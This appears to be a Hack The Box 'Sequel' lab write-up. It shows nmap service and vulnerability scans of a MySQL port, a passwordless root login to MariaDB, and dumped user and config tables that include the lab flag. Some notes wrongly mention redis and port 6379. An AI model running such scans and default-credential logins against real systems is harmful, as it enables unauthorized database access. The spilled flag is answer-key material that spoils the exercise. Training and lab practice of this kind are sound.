02.SEQUEL (MYSQL)
Last updated
Last updated
root@oco:~$ sudo openvpn ~/Downloads/starting_point.ovpnroot@oco:~$ nmap -sV -T4 {targetIP} -p-
PORT STATE SERVICE VERSION
3306/tcp open mysql?
* Typically '-sV' is used with Nmap to determine versions, but that's not always enough.
- adding the -sC is another good way to determine service versions
- the -sC option will run safe scripts which are designed to provide useful
information without being too intrusive or causing harm to the target systems.root@htb:~$ nmap -sV -sC -T4 {targetIP} -p 3306
PORT STATE SERVICE VERSION
3306/tcp open mysql?
| mysql-info:
| Protocol: 10
| Version: 5.5.5-10.3.27-MariaDB-0+deb10u1
| Thread ID: 98
| Capabilities flags: 63486
| Some Capabilities: Support41Auth, InteractiveClient, Speaks41ProtocolOld, LongColumnFlag, SupportsCompression, SupportsTransactions, IgnoreSigpipes, ConnectWithDatabase, SupportsLoadDataLocal, FoundRows, IgnoreSpaceBeforeParenthesis, DontAllowDatabaseTableColumn, Speaks41ProtocolNew, ODBCClient, SupportsAuthPlugins, SupportsMultipleResults, SupportsMultipleStatments
| Status: Autocommit
| Salt: rq_ju/)~cRQ"RU7Sz-oi
|_ Auth Plugin Name: mysql_native_password
* the -SC runs the default set of Nmap scripts (NSE scripts), which typically include
scripts for service enumeration, version detection, and other basic checks.
root@htb:~$ sudo nmap --script=vuln {targetIP} -p 3306
PORT STATE SERVICE
3306/tcp open mysql
* the --script=vuln will run scripts that focus specifically on detecting known
vulnerabilities in the service running on port 6379
- e.g., weak configurations, or known vulnerabilities in the redis service
- if no results are found then the service may be fully patched!root@htb:~$ which mysql
root@htb:~$ mysql --help
root@htb:~$ mysql -u root -h 10.129.198.75
MariaDB [(none)]>
* root is the the superuser account in MySQL, similar to the root user in Unix/Linux
systems. It has full privileges on the database server. it is the default for most installations.
- other possible defaults are mysql & admin
MariaDB [(none)]> help;
MariaDB [(none)]> show databases;
htb
MariaDB [(none)]> use htb;
MariaDB [htb]> show tables;
MariaDB [htb]> select * from users;
+----+----------+------------------+
| id | username | email |
+----+----------+------------------+
| 1 | admin | admin@sequel.htb |
| 2 | lara | lara@sequel.htb |
| 3 | sam | sam@sequel.htb |
| 4 | mary | mary@sequel.htb |
+----+----------+------------------+
4 rows in set (0.010 sec)
MariaDB [htb]> select * from config;
+----+-----------------------+----------------------------------+
| id | name | value |
+----+-----------------------+----------------------------------+
| 1 | timeout | 60s |
| 2 | security | default |
| 3 | auto_logon | false |
| 4 | max_size | 2M |
| 5 | flag | 7b4bec00d1a39e3dd4e021ec3d915da8 |
| 6 | enable_uploads | false |
| 7 | authentication_method | radius |
+----+-----------------------+----------------------------------+
7 rows in set (0.010 sec)